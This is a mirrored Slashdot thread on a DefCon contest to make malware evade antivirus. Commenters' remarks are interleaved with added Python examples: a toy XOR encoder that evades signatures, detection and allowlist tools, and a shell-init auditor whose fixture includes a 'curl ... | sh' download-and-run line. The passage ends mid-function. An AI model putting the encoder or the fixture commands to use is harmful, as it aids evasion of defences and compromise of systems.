Slashdot Mirror


Malware Modification Contest Has Antivirus Vendors Upset

SkiifGeek writes "Race to Zero, a sideline competition being set up at this year's DefCon, already has some Antivirus vendors steaming over the objectives of the contest. They are upset because it is essentially a polymorphism exercise. Entrants are given a set of malware samples which they must then modify to pass through a battery of antivirus scanners without detection while still carrying a viable payload. Even if competitors ignore the published vulnerabilities and weaknesses affecting antivirus vendors, the competition should turn up some interesting results. It may provide technical insight and concepts for further research as similar competitions have done in the past."
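The summary calls the contest a polymorphism exercise. What that means in practice is easiest to see in code, so the following Python is an added example (not from the submission, the contest, or any vendor): a toy byte-signature scanner, a one-byte XOR rewrite that leaves none of the original bytes in place, and the crude generic-unpacking step a scanner needs before signatures are any use against such variants. The sample body, the signature names and the stub marker are all constructed for the example.

```python
"""Toy byte-signature scanner versus a one-byte polymorphic rewrite.

Added example. The sample and the signatures are constructed stand-ins
for a malware body and a vendor signature database; nothing here is a
real sample or a real detection.
"""
from __future__ import annotations

# Constructed stand-in for a malicious body.
SAMPLE = b"CONSTRUCTED-SAMPLE: open C2 channel; drop payload; persist"

# Constructed signature database: fixed byte patterns, the way a purely
# signature-based engine matches.
SIGNATURES = {
    "Constructed.C2": b"open C2 channel",
    "Constructed.Dropper": b"drop payload",
}

# Marker standing in for a decoder stub (a real stub is code, this is a tag).
STUB_MAGIC = b"XOR1:"


def signature_hits(blob: bytes, signatures=SIGNATURES) -> list[str]:
    """Names of all signatures whose bytes occur verbatim in blob."""
    return [name for name, pattern in signatures.items() if pattern in blob]


def polymorph(body: bytes, key: int) -> bytes:
    """Rewrite body so none of its original bytes survive verbatim.

    Every byte is XORed with key; the header records the key for the
    decoder. A different key changes every output byte, so a new variant
    defeats a signature taken on any previous one without changing what
    the body does once decoded.
    """
    if not 1 <= key <= 255:
        raise ValueError("key must be a non-zero byte")
    encoded = bytes(b ^ key for b in body)
    return STUB_MAGIC + bytes([key]) + encoded


def decode(blob: bytes) -> bytes:
    """Inverse of polymorph(): what the stub does at run time."""
    if not blob.startswith(STUB_MAGIC):
        raise ValueError("not a polymorphed blob")
    key = blob[len(STUB_MAGIC)]
    return bytes(b ^ key for b in blob[len(STUB_MAGIC) + 1:])


def scan_with_unpacking(blob: bytes, signatures=SIGNATURES) -> list[str]:
    """Signature scan that first tries to undo the known encoding layer.

    Crude generic unpacking: instead of trusting the key in the header,
    try all 255 keys on the encoded region and scan each candidate. This
    catches every single-byte XOR variant of a known body and does
    nothing for an encoding it has not been taught.
    """
    hits = signature_hits(blob, signatures)
    if blob.startswith(STUB_MAGIC):
        region = blob[len(STUB_MAGIC) + 1:]
        for key in range(1, 256):
            candidate = bytes(b ^ key for b in region)
            for name in signature_hits(candidate, signatures):
                if name not in hits:
                    hits.append(name)
    return hits


if __name__ == "__main__":
    variant = polymorph(SAMPLE, 0x5A)
    print("plain   :", signature_hits(SAMPLE))
    print("variant :", signature_hits(variant))
    print("unpacked:", scan_with_unpacking(variant))
```

Run it and the plain body hits both signatures, the variant hits none, and the unpacking scan recovers both. Swap the encoding for anything the unpacker was not taught (a two-byte key, a different stub) and the last line goes back to nothing; that is the arms race the rest of the thread is arguing about.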

26 of 167 comments

  1. Oh no! by i_liek_turtles · · Score: 5, Insightful

    We may have to fix our software!

    1. Re:Oh no! by Frosty+Piss · · Score: 4, Insightful

      And really, I'm sorry, but what doesn't get these leeches in a tizzy? Anything that threatens their profit model....

      --
      If you want news from today, you have to come back tomorrow.
  2. Why should this upset them? by FlyByPC · · Score: 5, Insightful

    By having some top-notch creative talent (never mind which color hat they're wearing) take a stab at creating new styles of malware under controlled conditions, they're giving the antivirus vendors a great opportunity to study these creations -- and therefore to be better able to protect against them.

    Heck, if I were Symantec, McAfee et al -- I'd take the opportunity to try to *recruit* programmers who had interesting entries in the contest! (Better to have them working for you, right?)

    --
    Paleotechnologist and connoisseur of pretty shiny things.
    1. Re:Why should this upset them? by moosesocks · · Score: 4, Insightful

      Because polymorphism is considerably easier to implement than it is to circumvent (if it's even possible at all).

      Essentially, this punches a huge hole in the security model of Norton and McAfee's product lines, rendering them completely ineffective against this sort of threat.

      Personally, I've always found it remarkable that they've managed to hold on as long as they have, given just how deeply flawed the very notion of an Antivirus is.

      As long as you've got a decently secure operating system, nothing more than a rudimentary antivirus should be necessary.

      --
      -- If you try to fail and succeed, which have you done? - Uli's moose
    2. Re:Why should this upset them? by GIL_Dude · · Score: 4, Insightful

      Sorry, the OS doesn't really make any difference (assuming you have a firewall - which all current operating systems do - to protect against buffer overflows found on inbound ports). What makes the difference is secure users.

      I don't care how secure your OS is, if users are going to click on SomeFamousPersonNaked.exe , then they are going to eventually get owned - "secure" OS or not. We've all heard the "Linux doesn't get attacked much because it has an insignificant market share" and sort of argued around it - maybe the real one is "Linux doesn't get attacked much because the average Linux user knows enough to not click on ridiculous shit that gets emailed to them."

      I run both Windows and Linux and the only time I have had an AV product tell me "oh noes, there is a virus" is when I have been manually TRYING to infect a system in order to reverse engineer what the damn thing does (in order to create cleanup packages for work). These are in non-networked VMs where we also re-image the host afterwards. But really - a secure USER is what we need. The OS won't make all that much difference compared to the user.

    3. Re:Why should this upset them? by v1 · · Score: 2, Insightful

      Writing software is an investment. You put money in, you get money back. This contest DOES require them to put more money in, but they will get more money BACK. It's "forced investment". Now if you'd rather write a piece of software and then spend the next 6 years merely putting out new-os-compatibility updates, (and how many of those have we seen? many!) you will fall behind, and no one will care about upgrading to version 7 because there's nothing in 7 that their version 5 can't already do, and your product will wither. But that's what some are afraid of, being forced to continually improve their product. Some developers will see this not as an investment in their cash cow, but as an expense.

      It's things like this that cause "version 2" to mean something and make us want to buy it. Bug fixes and compatibility updates don't make updates attractive, they don't pay the bills. New features and new functionality do. If anything, Symantec should be happy this is happening.

      (and yes, I'm a programmer)

      --
      I work for the Department of Redundancy Department.
    4. Re:Why should this upset them? by moosesocks · · Score: 2, Insightful

      I don't care how secure your OS is, if users are going to click on SomeFamousPersonNaked.exe , then they are going to eventually get owned - "secure" OS or not. We've all heard the "Linux doesn't get attacked much because it has an insignificant market share" and sort of argued around it - maybe the real one is "Linux doesn't get attacked much because the average Linux user knows enough to not click on ridiculous shit that gets emailed to them."

      No. Linux and MacOS do not get attacked, because normal users don't run with the sort of privileges that would allow the virus (or trojan as in your example) to do very much damage or replicate itself.

      Similarly, replication of such a virus becomes even more difficult, as E-mail clients and servers both generally tend to block attachments containing executables...

      Sure, there are mechanisms for it to happen, but trojans generally don't spread very fast or very far. A true "virus" typically utilizes an OS exploit, or the fact that every *%*$#&ing Windows user runs with full administrative privileges.
      --
      -- If you try to fail and succeed, which have you done? - Uli's moose
    5. Re:Why should this upset them? by Jurily · · Score: 4, Insightful
      I was going to moderate, but I can't let this one slide.

      normal users don't run with the sort of privileges that would allow the virus (or trojan as in your example) to do very much damage or replicate itself.

      A normal user has access to the network and a home directory. How is that not enough for a virus?

      Sure, it can't burn itself into the registry or equivalent, but it sure as hell can replicate itself. Hell, it can even cause a lot of headaches when you're lazy like me and have a whole drive mounted in /home/jurily/stuff with full write access.

      Trojans are a different beast, of course, as they rely on the OS more heavily.
    6. Re:Why should this upset them? by Timothy+Brownawell · · Score: 4, Insightful

      Linux and MacOS do not get attacked, because normal users don't run with the sort of privileges that would allow the virus (or trojan as in your example) to do very much damage or replicate itself.

      WTF? Any program I run has +rw access to ~ (can start itself from .profile, do arbitrary damage to all the files I actually care about, and steal passwords and the like) and the ability to connect(2) to random parts of the internet (ability to replicate, send passwords, and fetch ads). No privileges beyond this are needed to cause trouble.

      The real reason is probably more to do with the size and average competency of the userbase.

    7. Re:Why should this upset them? by Kjella · · Score: 2, Insightful

      We've all heard the "Linux doesn't get attacked much because it has an insignificant market share" and sort of argued around it - maybe the real one is "Linux doesn't get attacked much because the average Linux user knows enough to not click on ridiculous shit that gets emailed to them."

      Which would put a very low upper limit on Linux's market share. The way Linux saves the noobs is that you don't do it in the first place, you go to add/remove programs and find the software you want there. The way Linux saves the warez-wannabes is that Linux doesn't need cracks. I'm sure that if Linux became more mainstream with more commercial software, you could have trusted shops that you could add in the same way as repositories. Think something like tucows, cnet, snapfiles etc. only for Linux. Basically, for 99% of the population going away from the "download random exes from the Intartubes" would be an upgrade to their security. Even if those sites only ran a basic virus scan and maybe on a tripwire machine. Users need a bigger difference between "opening" the jpg attachment and "opening" SomeFamousPersonNaked.jpg.exe, don't think users will get any smarter. Or just try to scare those users away from Linux so they don't spoil the average, though it'll make nobody safer nor any systems better.
      --
      Live today, because you never know what tomorrow brings
    8. Re:Why should this upset them? by zwei2stein · · Score: 4, Insightful

      Exactly right, except you forgot one thing:

      They don't actually need viruses and malware; they just need people (and businesses) to be afraid of them enough to consider them a threat.

      All you have to give to people is a feeling of security and to make them think that you can shield them from any nasty stuff they might have heard about on TV. And people are easily scared because they in general know little about computers.

      People are scared and they get AVs (or careless and they wouldn't get AV even if there were a billion virii), so you fight for market share rather than install.

      And the only feature you are going to sell to those people is the confidence of an impenetrable shield.

      So yeah, AV companies do want perception of threat high and actual threat low. That's when they make most money.

      Every real threat costs them money; every imaginary threat makes them money.

      --
      -- Technology for the sake of technology is as pathetic as eschewing technology because it's technology.
    9. Re:Why should this upset them? by gbjbaanb · · Score: 4, Insightful

      not really. Once the AV company has enough viruses in the wild to persuade you to buy their product, all the viruses past that point are just a costly nuisance to them.

    10. Re:Why should this upset them? by Anonymous Coward · · Score: 1, Insightful

      "dancingpigs.exe" is requesting extended access to your video services. dancingpigs.exe said:

      "In order for the 3D functions in this video to work properly, you must give this picture access to your graphics card. Answering "no" will not allow you to enjoy this film! Answer "yes" to view dancing pigs!"

      Would you like to give dancingpigs.exe root access to your video services?

      (Yes) (No)

      Guess which one the average user will pick...

    11. Re:Why should this upset them? by Dextrously · · Score: 2, Insightful

      The only thing anti-virus companies need to sell their product is the fear or threat of a virus. I suppose they believe there is more money in the fear mongering business than legitimate business. They may be right, I don't pretend to know. Having a virus scanner is pretty much a mindset in a windows environment. Even Windows Security Center will whine and complain if you don't have one (until you shoot it in the services.msc if you know what I mean).

      Take for example, Network Intrusion Detection Systems. They are supposed to be set up *before* an intrusion takes place. Even if there is no history of previous intrusion, they validate that your network is actually secure. History should have shown us by now that the majority of hax0rs want not only to get into your system, but to remain there as silently and as long as possible. Thus, a detection system is needed.

      An anti-virus company's selling pitch might be "How do you know you don't have a virus, if you don't have a virus scanner?". I am not an advocate for AV software, I'm just saying it as I see it.

    12. Re:Why should this upset them? by Anonymous Coward · · Score: 1, Insightful

      WTF? Any program I run has +rw access to ~


      A couple of points:

      A: If viruses on Linux were a problem, how hard would it be for you to change this without breaking the program (think selinux, apparmor, forking and dropping privileges, virtualization, chroot jails etc... )?

      B: If viruses on Linux were to become a problem, how quick would it be for distributions to do whatever the solution found in "A" was per default?

      C: How many Linux users would actually google for CD burning software and download it from an untrusted site using a Linux machine?

      Basically the only reason you are running Firefox with +rw to ~ is because it is considered an acceptable risk. Were trojans and viruses to start targeting, say Ubuntu, then it would be roughly 6 months, maybe 12 at a stretch , and then all internet facing applications would be sandboxed per default. If you didn't want to wait that long it would be relatively easy to make the changes yourself.

      The problem with windows isn't that you can't make it secure. The problem is that you have to work really hard to do so, it is designed in a manner which encourages users to act in insecure ways, and the security measures very often seem to follow the mantra "the user can't blame us if we've told him he is insecure".

      Btw, there is a big difference between compromising a user and full root privileges. If you have only compromised the user then it is fully possible for anti-virus software etc to have scans and sanity checks running as root that will spot the intrusion, whereas if you have compromised kernel space then you can destroy the defenses before they have a chance to alert the user. Of course, at the moment this is not necessary or even worthwhile on most Linux desktops, but it is definitely possible.
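The two comments above make the same point from opposite sides: an unprivileged compromise can only persist through files the user owns (.profile, .bashrc, autostart entries), which is also exactly where a root-run sanity check should look. The following Python is an added example, not from either commenter: a small audit of a shell init file that flags lines which load, run or background something from a user-writable path, or pipe a download into a shell. The init-file text is constructed, and the set of user-writable prefixes and executing words is an assumption for the example.

```python
"""Flag autostart hooks in a shell init file that point at user-writable paths.

Added example, not from the thread. Input is the text of a file such as
~/.profile or ~/.bashrc; output is a list of findings for a human (or a
root-run checker) to look at. The sample file below is constructed.
"""
from __future__ import annotations
import re
import shlex

# Locations an unprivileged process can write to (assumed for the example).
USER_WRITABLE_PREFIXES = ("/home/", "~", "$HOME", "/tmp/", "/var/tmp/", "/dev/shm/")

# First words that execute or load whatever follows them.
EXEC_WORDS = {"source", ".", "exec", "nohup", "bash", "sh", "python", "python3", "perl", "eval"}

# Constructed ~/.profile: two harmless lines and three that deserve a look.
SAMPLE_PROFILE = """\
# ~/.profile (constructed sample for the example)
export PATH="$HOME/bin:$PATH"
umask 022
. ~/.profile_extra
nohup /home/alice/.cache/.fontcache/updater >/dev/null 2>&1 &
curl -s http://example.invalid/x | sh
"""


def _mentions_user_path(token: str) -> bool:
    return token.startswith(USER_WRITABLE_PREFIXES)


def suspicious_lines(init_text: str) -> list[tuple[int, str, str]]:
    """Return (line_no, reason, line) for lines that run or load user-writable files."""
    findings: list[tuple[int, str, str]] = []
    for no, raw in enumerate(init_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            tokens = shlex.split(line, comments=True)
        except ValueError:
            findings.append((no, "unparseable line", line))
            continue
        if not tokens:
            continue
        head = tokens[0]
        if line.endswith("&") and any(_mentions_user_path(t) for t in tokens):
            # "something &" is the classic way to keep a process alive after login.
            findings.append((no, "backgrounded command from user-writable path", line))
        elif head in EXEC_WORDS and any(_mentions_user_path(t) for t in tokens[1:]):
            findings.append((no, f"'{head}' loads/runs a user-writable path", line))
        elif _mentions_user_path(head) and not head.endswith("/"):
            findings.append((no, "direct execution of a user-writable path", line))
        elif re.search(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", line):
            findings.append((no, "pipes downloaded content into a shell", line))
    return findings


if __name__ == "__main__":
    for no, reason, line in suspicious_lines(SAMPLE_PROFILE):
        print(f"line {no}: {reason}: {line}")
```

The `export PATH=...` and `umask` lines pass; the sourced file under ~, the backgrounded binary under a dot-directory in /home, and the curl-into-sh line are reported. Pointing it at real files is a matter of reading ~/.profile, ~/.bashrc and friends (as root, so a compromised user cannot lie about them); what it does not catch is persistence via cron, systemd user units or desktop autostart entries, which need their own parsers.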
    13. Re:Why should this upset them? by MikeBabcock · · Score: 2, Insightful

      Sure, but unlike the Windows user, he can then log in as root and clean out his infection from his normal user account and move on with his life.

      In the Windows case, I hope you have a backup because its time to re-install Windows.

      PS, rkhunter is a great example of a program that detects for real Linux infections, for those looking.

      --
      - Michael T. Babcock (Yes, I blog)
  3. Can you say Ralph Nader? by zappepcs · · Score: 5, Insightful
    What would happen if Ralph got involved in the computer antivirus field?

    let's translate FTFA

    "It will do more harm than good to our company," said Paul Ferguson, a researcher with antivirus vendor TrendMicro. "Responsible disclosure is one thing, but now actually encouraging people to do this (as if the NSA isn't already doing so), as a contest is a little over the top. When really smart people start working on malicious software, we won't be able to keep up" Bold edits added by me.

    How about this slogan "Unsafe with any version!"

    I think they are afraid that regular joe end users are about to find out that programs meant to protect your pc are always an after the fact effort which leaves you vulnerable until you update and that there is no way to keep you safe from a zero-day facebook exploit. Even the government websites can be malicious until patched/fixed.

    And soon, the conclusion will be ... uh, why pay for that. Spybot search and destroy is free, and ClamAV is free. I can just give them a one time donation and get just as good of protection... hmmmm These pricey programs really can't do all that much.

    Wow, it would be such a shame if joe bloggs end user found out the truth. tisk tisk
    1. Re:Can you say Ralph Nader? by aaron.axvig · · Score: 1, Insightful

      "Unsafe with any version!"

      Hence why I don't run any security products at all. They just pointlessly slow down your computer. I don't remember the last time I got infected (over 5 years?). Just have to be smart. But the security products don't help casual users either. Look at my family's computer...running AVG but someone went and downloaded a bunch of P2P crap and now there is no way short of a Windows re-install that will clean it up.

  4. Depends on conditions... by Fallen+Andy · · Score: 2, Insightful
    If this is being run like the hacking laptops thing recently, then what's the big deal? So long as the vulnerabilities are only disclosed to *all* AV vendors in private afterwards...

    The AV vendors who are complaining are more afraid of *other* vendors than xploits... If anything found here goes to all then it levels the playing field open source style...

    Andy

    1. Re:Depends on conditions... by Anonymous Coward · · Score: 1, Insightful

      So long as the vulnerabilities are only disclosed to *all* AV vendors in private afterwards...

      Who said anything about "in private"? I hope they post all the entries on their website. Shouldn't consumers have the right to know how they're vulnerable?

      Besides, I hardly believe the Defcon crowd will go for a "Trust us, for reasons we can't disclose, the winner was ..." And with all the people at Defcon, the results are bound to get leaked somewhere anyway.

    2. Re:Depends on conditions... by phantomfive · · Score: 2, Insightful

      The fear they have is that people will realize how useless anti-virus software really is. If there are simple techniques to get around any anti-virus software, and the whole world knows it, then there's not much point in paying to run some AV software that just slows down your computer, is there? Already we know that AV software is useless against 0-day exploits, and if your vendor is making reasonably timed updates, your AV software only has nominal value anyway.

      This contest will just go a little farther to help us understand exactly how useful AV software is. I am interested in seeing the results. AV software still has a place in the world, to scan emails to prevent exploits from people who don't patch their systems.

      --
      Qxe4
  5. Maybe they should actually fix the problems? by flyingfsck · · Score: 2, Insightful

    The present crop of virus scanners are a really dumb idea, since they don't provide any real protection. Consequently I am all for this kind of competition. Hopefully it will force Microsoft and the AV parasites to create a proper security solution for the MS crapware.

    --
    Excuse me, but please get off my Pennisetum Clandestinum, eh!
    1. Re:Maybe they should actually fix the problems? by Consul · · Score: 2, Insightful

      Well, the idea of Default Deny makes perfect sense to me. Tell the OS which programs are allowed to run, and notify me if something I have not explicitly allowed tries to execute, wherein I can take the opportunity to allow it or not. I run a total of a couple dozen programs, grand total, so it wouldn't be hard to get a system up and running after a new install.

      Since you seem to be a security expert in your own right, beyond anything Marcus has ever done, feel free to explain why this basic idea will not work at all.

      And he's not really my hero. Notice the smiley on the end there. I just think he has ideas that make sense.

      --

      -----

      "You spilled my egg... I needed that egg."
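The Default Deny idea in the comment above is a hash allowlist plus a decision rule. The following Python is an added example, not from the commenter and not any vendor's product: it snapshots the executables in a trusted tree after install, then judges a program by the hash of its content (so a binary replaced in place is no longer allowed, while the same bytes at another path still are) and returns allow, deny, or prompt-the-user. The enforcement hook that actually blocks execution (an LSM policy, a kernel module, AppLocker on Windows) is assumed and not implemented; the trusted tree and the "downloaded" file are constructed in a temporary directory.

```python
"""Default Deny for program execution, as a content-hash allowlist.

Added example, not from the thread. Only the decision logic is shown;
the hook that intercepts execution is assumed. The files used in demo()
are constructed in a temporary directory.
"""
from __future__ import annotations
import hashlib
import os
import tempfile
from pathlib import Path

ALLOW, DENY, PROMPT = "allow", "deny", "prompt"


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_allowlist(trusted_dirs) -> dict[str, str]:
    """Snapshot every executable file under trusted_dirs as hash -> path.

    Taken right after a clean install this is the 'couple dozen programs'
    the comment describes. Keying by content hash rather than by path
    means a binary replaced in place drops off the list.
    """
    allow: dict[str, str] = {}
    for d in trusted_dirs:
        for p in Path(d).rglob("*"):
            if p.is_file() and os.access(p, os.X_OK):
                allow[sha256_of(p)] = str(p)
    return allow


def decide(path: Path, allowlist: dict[str, str], interactive: bool = True) -> str:
    """Default deny: a hash not on the list is denied, or put to the user if interactive."""
    try:
        digest = sha256_of(path)
    except OSError:
        return DENY
    if digest in allowlist:
        return ALLOW
    return PROMPT if interactive else DENY


def demo(tmp: Path) -> tuple[str, str, str]:
    """Snapshot a tiny trusted tree, then judge a copied, a replaced and a new binary."""
    trusted = tmp / "trusted"
    trusted.mkdir(parents=True, exist_ok=True)
    editor = trusted / "editor"
    editor.write_bytes(b"#!/bin/sh\necho editor\n")
    editor.chmod(0o755)
    allow = build_allowlist([trusted])

    # Same content at a different path: still allowed, the list is keyed by hash.
    copy = tmp / "editor-copy"
    copy.write_bytes(b"#!/bin/sh\necho editor\n")
    # Same path, different content: a trojaned replacement of 'editor'.
    editor.write_bytes(b"#!/bin/sh\necho editor; echo call-home\n")
    # Something the user just downloaded (constructed junk, not a real binary).
    download = tmp / "Downloads" / "SomeFamousPersonNaked.exe"
    download.parent.mkdir(exist_ok=True)
    download.write_bytes(b"MZ constructed junk")

    return (decide(copy, allow),
            decide(editor, allow),
            decide(download, allow, interactive=False))


def demo_in_tempdir() -> tuple[str, str, str]:
    with tempfile.TemporaryDirectory() as d:
        return demo(Path(d))


if __name__ == "__main__":
    print(demo_in_tempdir())
```

The demo returns ("allow", "prompt", "deny"). The weak spot is the prompt: every interpreter and script runner already on the list can execute arbitrary code from data files without tripping the hash check, so an allowlist has to cover what the allowed programs are permitted to load, not just which binaries may start.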

  6. Re:Eventuality by maxwell+demon · · Score: 2, Insightful

    By Rice's theorem, proving any non-trivial property of a program is equivalent to the halting problem. Hence AV detection is an ultimately losing battle. But then, there is no need to be able to prove 100% that the software is harmful. The simple rule could be: If you cannot prove that it isn't harmful, it's a security risk. Of course for that rule to be useful, the class of programs where you can prove it has to be large enough to allow for any useful behaviour. This certainly is hard, and maybe it's not achievable, but I don't know of any proof for that.

    Note that the halting problem does not say that you cannot write a program which can tell for some algorithms if they will halt. The halting problem says that no program can decide it on all algorithms. That makes algorithms deciding the halting problem (or an equivalent problem) for some algorithms no less obsolete than Gödel's proof that not all true theorems can be proven makes proofs in mathematics obsolete.
    --
    The Tao of math: The numbers you can count are not the real numbers.
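The comment's rule ("if you cannot prove it isn't harmful, treat it as a risk") is what a conservative static analyser does: it decides harmlessness for a restricted class of programs and refuses everything it cannot follow. The following Python is an added example, not from the commenter, of that shape of analyser on Python source using the ast module. A program is proven harmless only if every call is to an allowlisted name or to a function defined in the same source, and there are no imports, no dynamic constructs and no method calls it cannot resolve; anything else gets "cannot prove harmless". The allowlist, the verdict names and the three sample programs are constructed for the example.

```python
"""Conservative 'prove it harmless or treat it as a risk' checker.

Added example, not from the thread. Rice's theorem rules out deciding
'harmful' for all programs; it does not rule out proving 'harmless' for
a restricted class and refusing the rest, which is what this does for
Python source. Allowlist and samples are constructed for the example.
"""
from __future__ import annotations
import ast

SAFE, UNKNOWN = "proven-harmless", "cannot-prove-harmless"

# Calls the analyser is willing to vouch for: pure computation and output.
ALLOWED_CALLS = {"len", "range", "sum", "min", "max", "print", "sorted", "abs", "str", "int"}

# Calls that run code or touch the outside world, so no proof is possible here.
UNPROVABLE_CALLS = {"eval", "exec", "compile", "__import__", "getattr", "setattr",
                    "globals", "locals", "open"}

SAMPLES = {
    # Only arithmetic, a local function and print: inside the provable class.
    "sum": "def total(xs):\n    return sum(x * x for x in xs)\nprint(total(range(10)))\n",
    # Decodes and executes data: the analyser cannot know what runs.
    "dynamic": "import base64\nexec(base64.b64decode('cHJpbnQoMSk='))\n",
    # The exec is hidden behind a variable; the analyser does not follow data flow.
    "opaque": "f = [print, exec][1]\nf('print(2)')\n",
}


def _reasons(tree: ast.AST) -> list[str]:
    """Every construct that keeps the analyser from vouching for the program."""
    defined = {n.name for n in ast.walk(tree) if isinstance(n, ast.FunctionDef)}
    reasons: list[str] = []
    for node in ast.walk(tree):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            reasons.append("imports a module (its effects are outside the analysed code)")
        elif isinstance(node, ast.Call):
            fn = node.func
            if isinstance(fn, ast.Name):
                if fn.id in UNPROVABLE_CALLS:
                    reasons.append(f"unprovable call {fn.id}()")
                elif fn.id not in ALLOWED_CALLS | defined:
                    reasons.append(f"call to unvetted name {fn.id}()")
            else:
                # obj.method(...) or f()(...): the target is not a plain name.
                reasons.append("call whose target is not a plain name")
        elif isinstance(node, ast.Attribute) and node.attr.startswith("__"):
            reasons.append(f"dunder attribute access .{node.attr}")
    return reasons


def verdict(source: str) -> tuple[str, list[str]]:
    """(verdict, reasons). Source that does not even parse cannot be proven anything."""
    try:
        tree = ast.parse(source)
    except SyntaxError as e:
        return UNKNOWN, [f"syntax error: {e.msg}"]
    reasons = _reasons(tree)
    return (SAFE, []) if not reasons else (UNKNOWN, reasons)


if __name__ == "__main__":
    for name, src in SAMPLES.items():
        v, why = verdict(src)
        print(f"{name:8s} {v}  {'; '.join(why)}")
```

The "opaque" sample is the instructive one: the analyser never proves it harmful, it simply cannot prove it harmless because `f` is not a name it can vouch for, and the rule does the rest. The price is the size of the provable class: with no imports and no method calls allowed, almost no real program passes, which is the "large enough to allow for any useful behaviour" problem the comment names.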
  7. What? A real world test? Ev1l H4x0|~z! by Vellmont · · Score: 2, Insightful

    The vendors' reply is just classic. It's essentially an admission that their products don't work. The whole AV industry is built on trying to identify existing viruses, and have a signature for them.

    Of course, if you find the virus out in the wild and identify it, you've already failed for a lot of people. (but I'm sure they don't like to talk about that).

    This is like a safe manufacturer objecting to someone actually trying to break open a safe like a real criminal would. "What! You used a crowbar and liquid nitrogen?! You're just letting the criminals know more about cold+crowbar usage!!! You should know OUR safes protect against sledgehammers VERY well."

    Get real AV vendors. Everyone already knows you can't stand up to new viruses, and only protect against the known ones. People still buy your damn software anyway, because it's better than nothing.

    --
    AccountKiller
  8. Privileges are needed by DrYak · · Score: 3, Insightful

    There's not need for elevated permissions.

    No, there is need. Under Linux a non privileged software has only access to high-level network access, such as opening a regular connection. There's no low-level access to network (crafting the data packets as wished) for non privileged software.

    Thus a potential running virus, *COULD* connect to its C&C if it receives its orders from an IRC channel.
    But the virus won't be able to create spoofed packets (used for sophisticated bounces and DDOS) or specially crafted packets to exploit flaws on the target system.
    Whereas under Windows, non-privileged applications CAN craft packets, and users run as administrators anyway.

    A non privileged process CAN download Ads from the internet, but it will have a harder time injecting them into the browser window.
    An admin-privileged process in Windows could hijack the network stack and rewrite HTML on the fly inserting pop-ups and ads.
    Under a non-privileged account in Linux, it can't. The virus will need instead to be able to rewrite the configuration of all gazillion of browser that exist in Linux, either injecting a spyware plugin or rerouting the traffic through a proxy process spawned by the virus. Anyway, the absence of a single point of attack, and the lack of monoculture make Linux a more complicated target.

    Also, few user-friendly type distros (Ubuntu and the like) come with a sendmail (or equivalent) configured out-of-the-box for internet message delivery. Usually it's only configured to deliver alerts to the local user account.
    A potential operational Spam bot would either have to send directly the spam to the internet and both hope that the network isn't configured to reject email not going out through the SMTP server and hope that the infected machine doesn't sit on a dynamic IP which will automatically get discarded on the receiving machine.
    Or the potential Spam Bot will need additional complexity to retrieve the user's SMTP configuration, which will be difficult, both because there's a gazillion of different mail clients under linux, and because several of them password-encrypt the credential (Thunderbird can do it and all KDE software store their passwords in KWallet which is masterpassword-encrypted by default).
    This is security by diversity, and why it's good to avoid monocultures.
    This is opposed to Windows, where most users have outlook express, which lacks the ability to encrypt the credentials.

    Under Linux, it takes several steps to execute code downloaded from a browser, as a reference, see the HOWTOs about downloading the latest GPU drivers straight from the manufacturer's site instead of using whatever is the regular package management/delivery mechanism used by the distro (you have to manually chmod it "executable". Clicking on it usually opens an editor).
    And that's neglecting that it is possible to "noexec" the whole home, in which case it's not even possible to *run* code from ~.
    So even if he wanted to, a linux user can't just click on "NataliePortmanNaked.sh" and execute it (unless its a regular package inside Synaptic or YaST, of course) whereas a Windows user can click on "PetrifiedWithHotGrits.exe".

    Also, downloading software from random websites isn't as common in Linux as in Windows. Mostly only geeks download software for Linux and usually they download it in (controllable) source form, where anomalies could more easily get spotted.
    The regular user will employ the package management system for the distro to get the needed package from the regular repository instead, as because of the diversity of Linux distros, he'll need a custom compiled package for the present distro,
    i.e., a Windows user wanting a kitten-powered screensaver will google around to find a page proposing some spyware infested screensaver. Anyone can download, but you *need* to be computer-literate and careful about your source to *avoid* getting undesired stuff.

    The Linux users will browser Synaptic and download the package "omg-lol-ponie

    --
    "Sufficiently advanced satire is indistinguishable from reality." - [Tips: 1DrYakQDKCQ6y52z6QbnkxHXAocMZJE61o ]
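Two of the claims in the comment above are checkable on the machine you are sitting at: whether an unprivileged process may open a raw socket (the "crafting the data packets" access), and whether the home directory is on a noexec mount. The following Python is an added example, not from the commenter: it asks the kernel for a raw ICMP socket and reports the answer, reads CAP_NET_RAW out of /proc/self/status to show why, and parses /proc/mounts to find the options of the mount a path lives on. The /proc/mounts text used in the demo is constructed; the capability bit number is from the kernel's capability.h.

```python
"""What an unprivileged Linux process actually gets: two checks.

Added example, not from the thread. Plain checks, not a demonstration of
any attack. The sample mount table is constructed.
"""
from __future__ import annotations
import os
import socket

CAP_NET_RAW = 13  # bit index in CapEff (linux/capability.h)

# Constructed /proc/mounts: root normal, /home and /tmp mounted noexec.
MOUNTS_SAMPLE = """\
/dev/sda1 / ext4 rw,relatime 0 0
/dev/sda2 /home ext4 rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec 0 0
"""


def raw_socket_permitted() -> bool:
    """True if socket(AF_INET, SOCK_RAW, IPPROTO_ICMP) succeeds.

    Without CAP_NET_RAW the kernel refuses with EPERM, which Python
    surfaces as PermissionError. This is the access needed to craft
    packets; a normal TCP connection does not need it.
    """
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
    except PermissionError:
        return False
    s.close()
    return True


def tcp_socket_permitted() -> bool:
    """The 'high-level' access the comment describes: any user gets this."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM):
        return True


def has_cap_net_raw(status_text: str | None = None) -> bool | None:
    """Read CAP_NET_RAW from the CapEff line of /proc/self/status; None if unavailable."""
    if status_text is None:
        try:
            with open("/proc/self/status") as f:
                status_text = f.read()
        except OSError:
            return None
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return bool((int(line.split()[1], 16) >> CAP_NET_RAW) & 1)
    return None


def mount_options_for(path: str, mounts_text: str) -> list[str]:
    """Options of the longest mount point that is a prefix of path (/proc/mounts format)."""
    best, opts = "", []
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        mnt, options = fields[1], fields[3].split(",")
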